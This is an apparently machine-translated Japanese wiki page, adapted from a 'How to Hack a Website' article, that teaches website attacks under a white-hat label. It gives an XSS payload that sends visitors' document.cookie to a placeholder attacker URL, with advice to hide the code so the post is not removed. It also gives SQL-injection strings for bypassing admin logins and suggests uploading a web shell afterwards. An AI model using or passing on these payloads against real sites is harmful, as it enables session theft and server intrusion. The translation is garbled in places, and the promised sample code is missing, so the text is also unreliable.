ウェブサイトをハックする方法

ページ名:ウェブサイトをハックする方法

ハッカーはすべて悪意を持っていると思い込んでいる人がいるが、そうではない!「ホワイトハット "ハッカーは、サイト所有者がセキュリティを向上させるために、ウェブサイトの脆弱性を悪用します!このWikiHowでは、ホワイトハット・ハッカーとしてウェブサイトをハックする2つの方法を紹介します。

方法1

クロスサイト・スクリプティングを使う

  1. コンテンツを投稿できる脆弱なサイトを見つけます。掲示板が良い例だ。サイトがクロスサイト・スクリプティング攻撃に対して脆弱でない場合、この方法は機能しないことを覚えておいてほしい。
  2. 投稿を作成する。投稿」に特別なコードを入力し、それをクリックした人のデータを取得する必要があります。
    • システムがコードをフィルタリングするかどうかテストしてください。投稿 <script>window.alert("test")</script>投稿をクリックしたときにアラートボックスが表示されたら、そのサイトは攻撃に対して脆弱です。
  3. クッキー・キャッチャーを作成し、アップロードしてください。この攻撃の目標はユーザのクッキーを捕捉することで、脆弱なログインを持つウェブサイトのアカウントにアクセスできるようにすることです。クッキー・キャッチャーが必要で、ターゲットのクッキーを捕捉し、それをリルートします。キャッチャーを、アップロードを介したリモート・コード実行に脆弱な、あなたがアクセスできるウェブサイトにアップロードし てください。クッキー・キャッチャー・コードの例はサンプル・セクションにあります。
  4. クッキー・キャッチャーを使って投稿してください。クッキーをキャプチャしてあなたのサイトに送る適切なコードを投稿に入力してください。疑惑を減らし、投稿が削除されないようにするために、コードの後にいくつかのテキストを入れたいと思うでしょう。
    • コードの例は次のようになります。
      <iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookie catcher.PHP?c=' document.cookie)></iframe>。
  5. 収集したクッキーを使用する。この後、あなたのウェブサイトに保存されているはずのクッキー情報を、必要な目的に使用することができます。
方法 2

インジェクション攻撃を実行する

  1. 脆弱なサイトを見つける。管理者ログインに簡単にアクセスできる脆弱なサイトを見つける必要があります。admin login.aspかadmin login.phpで検索してみてください。
  2. ユーザー名としてadminと入力し、パスワードとしていくつかの異なる文字列のいずれかを使用します。これらの文字列は、いくつかの異なる文字列のいずれかにすることができますが、一般的な例としては、1'または1'='1'または2'='2'です。
  3. .これには少し試行錯誤が必要だろう。
  4. ウェブサイトにアクセスする。最終的には、ウェブサイトが攻撃に対して脆弱であると仮定して、ウェブサイトへの管理者アクセスを許可する文字列を見つけることができるはずだ。その後、管理者としてログインし、ファイルのアップロードができれば、ウェブシェルをアップロードしてサーバー側にアクセスするなど、さらなるアクションを実行することができる。
方法3

成功のためのセットアップ

  1. 1つか2つを学ぶウェブサイトをハックする方法を学びたいのであれば、コンピューターやその他のテクノロジーがどのように機能するかを理解する必要があります。PHP(サーバーサイドの脆弱性を突くのに必要)、などのプログラミング言語を学び、コンピュータをよりうまくコントロールできるようになり、システムの脆弱性を特定できるようになりましょう。
  2. 基本的なリテラシーを身につける。特にウェブサイトをハックしたいのであれば、HTMLとJavaScriptを本当によく理解しておく必要もある。これを学ぶには時間がかかるが、インターネット上には無料で学べる方法がたくさんあるので、それを利用しようと思えば、必ずチャンスはある。
  3. ホワイトハットに相談する。ホワイトハットは、その力を善のために使い、セキュリティの脆弱性を暴き、インターネットを誰にとってもより良い場所にするハッカーだ。もしあなたがハッキングを学び、その力を善のために使いたいなら、あるいはあなたのウェブサイトを守る手助けをしたいのなら、何人かの現役のハッカーに連絡してアドバイスをもらうといいだろう。
  4. ハッキングを研究するもしあなたがハッキングを学びたいのなら、あるいはただ自分の身を守りたいのなら、いろいろと調べる必要があるだろう。ウェブサイトが脆弱である可能性は非常に多く、そのリストは常に変化しているため、常に学習する必要があります。
  5. 常に最新の情報を入手すること。ハッキングの可能性は常に変化し、新しい脆弱性が発見されるため、常に最新の情報を入手する必要があります。今あるタイプのハックから守られているからといって、将来も安全であるとは限りません!

サンプル・クッキー・キャッチャー・コード

この記事は、CC BY-NC-SAの下で公開された " How to Hack a Website " を改変して作成されました。特に断りのない限り、CC BY-NC-SAの下で利用可能です。

シェアボタン: このページをSNSに投稿するのに便利です。

コメント

返信元返信をやめる

※ 悪質なユーザーの書き込みは制限します。
最新を表示する
NGIDの確認

NG表示方式

NGID一覧